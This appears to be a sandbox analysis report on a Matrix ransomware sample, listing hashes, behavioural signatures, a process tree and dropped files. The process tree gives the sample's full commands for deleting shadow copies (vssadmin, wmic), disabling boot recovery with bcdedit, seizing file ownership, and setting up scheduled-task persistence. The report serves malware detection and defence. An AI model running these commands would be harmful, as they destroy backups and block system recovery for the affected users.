Overview

overview

10

Static

static

8

2e4c3ae323...76.exe

windows7-x64

10

2e4c3ae323...76.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-12-2022 10:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe

  • Size

    610KB

  • MD5

    1c73c307773fedfccd544a6b6b0b55b9

  • SHA1

    899ffd934e0b8a6df4b115c49df33fca524e2135

  • SHA256

    2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376

  • SHA512

    049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d

  • SSDEEP

    12288:mT9zGQU31phksyH0F8eHSE3BGAFTT/OAchocfoOG6FTvcDldnozRpXFqOO:mRyQUlGuLSE3BGAF//xlcfoO/IDr6FqO

Score
10/10
matrixdiscoveryevasionpersistenceransomwarespywarestealerupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops desktop.ini file(s) 29 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe
    "C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe" "C:\Users\Admin\AppData\Local\Temp\NWDFhFTl.exe"
      2⤵
        PID:4628
      • C:\Users\Admin\AppData\Local\Temp\NWDFhFTl.exe
        "C:\Users\Admin\AppData\Local\Temp\NWDFhFTl.exe" -n
        2⤵
        • Executes dropped EXE
        PID:4340
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\sXjDdMFW.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:988
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3052
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5P8E7x8U.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:812
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5P8E7x8U.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:4868
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:2104
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:4780
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\xhrZizj0.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:588
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\xhrZizj0.vbs"
              3⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4276
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ZMejHEtF.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3976
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ZMejHEtF.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:3788
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4360
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:1120
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ha9kdW4l.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:668
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                3⤵
                • Views/modifies file attributes
                PID:3616
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
                3⤵
                  PID:4392
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                  3⤵
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4468
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c trT2KPvl.exe -accepteula "store.db" -nobanner
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1652
                  • C:\Users\Admin\AppData\Local\Temp\trT2KPvl.exe
                    trT2KPvl.exe -accepteula "store.db" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4040
                    • C:\Users\Admin\AppData\Local\Temp\trT2KPvl64.exe
                      trT2KPvl.exe -accepteula "store.db" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Sets service image path in registry
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3708
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ZMejHEtF.bat"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:1064
              • C:\Windows\system32\vssadmin.exe
                vssadmin Delete Shadows /All /Quiet
                2⤵
                • Interacts with shadow copies
                PID:3372
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic SHADOWCOPY DELETE
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3312
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:2308
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:1460
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN DSHCA /F
                2⤵
                  PID:1676
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3476

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\$Recycle.Bin\S-1-5-21-2629973501-4017243118-3254762364-1000\desktop.ini
                Filesize

                1KB

                MD5

                aab7c9a144728592e081204149ac025d

                SHA1

                f0ca4c65e3d968cdf590e38d5ddbb68c255cf234

                SHA256

                19f088d0fcd5ea978c4b6b8c24d672bf5f83b5b336ff51c02c842914d7079e50

                SHA512

                c754b91f0adcf012b2f989e3c6092922fdf26a2573154c47509dee7a4658f3fd5b621a85cd3f9e04b452e07451bdae7f2a52e7cd8540279a0c96b95c8f22b2d7

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                Filesize

                3KB

                MD5

                5cf1bc3b00a2055ddc75f7af0b0b6377

                SHA1

                60646f1eb3e7d0723518ad45b46a4b617fe06e5f

                SHA256

                90151eb9ed08a758902863a321d592b73b12caa63e8d34975caf943aca6ba0a4

                SHA512

                959d188df646c561b3ab2a3c58b67075a011dbfc211fac4d5457f359effa2e80e875df1a7e230cc204ab313fdddc6681eb70067e298a247a87d866752d2fdb5f

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\NWDFhFTl.exe
                Filesize

                610KB

                MD5

                1c73c307773fedfccd544a6b6b0b55b9

                SHA1

                899ffd934e0b8a6df4b115c49df33fca524e2135

                SHA256

                2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376

                SHA512

                049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\NWDFhFTl.exe
                Filesize

                610KB

                MD5

                1c73c307773fedfccd544a6b6b0b55b9

                SHA1

                899ffd934e0b8a6df4b115c49df33fca524e2135

                SHA256

                2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376

                SHA512

                049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ha9kdW4l.bat
                Filesize

                246B

                MD5

                e9b887c0c3d72d5463d15a53d38d455b

                SHA1

                0a8c2c4d509234a9022ee6ce995ec60e0968d987

                SHA256

                77d9d6c2b32554897f40ffb5b613fa8b18407676cdb4dfd093ae45b5feb8a110

                SHA512

                a11a2867712b9293b0b6d4e405d8c9c1a0a02dfde2b8761bd6d46578a464c4bebc5ff36d5b9579e1acce25f99d5e5faab63f6edb7cd2ed8bd65b3d793bddc99e

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\sXjDdMFW.txt
                Filesize

                14B

                MD5

                8eb51985066cb0782077f624013d47a2

                SHA1

                0549d07d51454e73b937946ba1887cacfce71835

                SHA256

                5537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44

                SHA512

                539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\trT2KPvl.exe
                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\trT2KPvl.exe
                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\trT2KPvl64.exe
                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\trT2KPvl64.exe
                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                Download Submit

              • C:\Users\Admin\AppData\Roaming\ZMejHEtF.bat
                Filesize

                265B

                MD5

                eb48df6e9fa2a39f51e1aebf58b5754a

                SHA1

                2fa98613ec0ae185b837155fb60997505da50f82

                SHA256

                a9ce1195f398fc2038680be49a0d1747dd83bc79927ecf7b3c23b19a328f9cce

                SHA512

                50b7b12e590f90426898469ef5d32f9b77774589dbf20b4c5083a86355cfb4cb94b2cb51b7ca5973713a2bfd78365c67141fd73aac35012b433e787f9fc01411

                Download Submit

              • C:\Users\Admin\AppData\Roaming\xhrZizj0.vbs
                Filesize

                260B

                MD5

                95698a0870d53d9d9e5334ed5a1d166d

                SHA1

                acdae2799987632c3988c4a58b37a9438f41897a

                SHA256

                2c82896bdf526eab5b4a75539ff3920eaff2a94c07553f5d7f74b92232636b49

                SHA512

                088f5504bad0f8cbec2731cea1e968aa96606e1617c0a603953d58585b6b353012cf40f43834cacfa7878a89ec082fe6b16c096bbf9bc6174e030e7654b12264

                Download Submit

              • memory/956-132-0x0000000000400000-0x0000000000582000-memory.dmp

                Filesize

                1.5MB

                Download

              • memory/956-148-0x0000000000400000-0x0000000000582000-memory.dmp

                Filesize

                1.5MB

                Download

              • memory/3052-143-0x0000000004D80000-0x0000000004DE6000-memory.dmp

                Filesize

                408KB

                Download

              • memory/3052-140-0x0000000002180000-0x00000000021B6000-memory.dmp

                Filesize

                216KB

                Download

              • memory/3052-142-0x0000000004AE0000-0x0000000004B02000-memory.dmp

                Filesize

                136KB

                Download

              • memory/3052-147-0x0000000005F90000-0x0000000005FAA000-memory.dmp

                Filesize

                104KB

                Download

              • memory/3052-145-0x0000000005A80000-0x0000000005A9E000-memory.dmp

                Filesize

                120KB

                Download

              • memory/3052-141-0x0000000004EA0000-0x00000000054C8000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/3052-144-0x00000000054D0000-0x0000000005536000-memory.dmp

                Filesize

                408KB

                Download

              • memory/3052-146-0x00000000070F0000-0x000000000776A000-memory.dmp

                Filesize

                6.5MB

                Download

              • memory/4040-177-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

                Download

              • memory/4040-168-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

                Download

              • memory/4340-184-0x0000000000400000-0x0000000000582000-memory.dmp

                Filesize

                1.5MB

                Download

              • memory/4340-137-0x0000000000400000-0x0000000000582000-memory.dmp

                Filesize

                1.5MB

                Download

              • memory/4340-160-0x0000000000400000-0x0000000000582000-memory.dmp

                Filesize

                1.5MB

                Download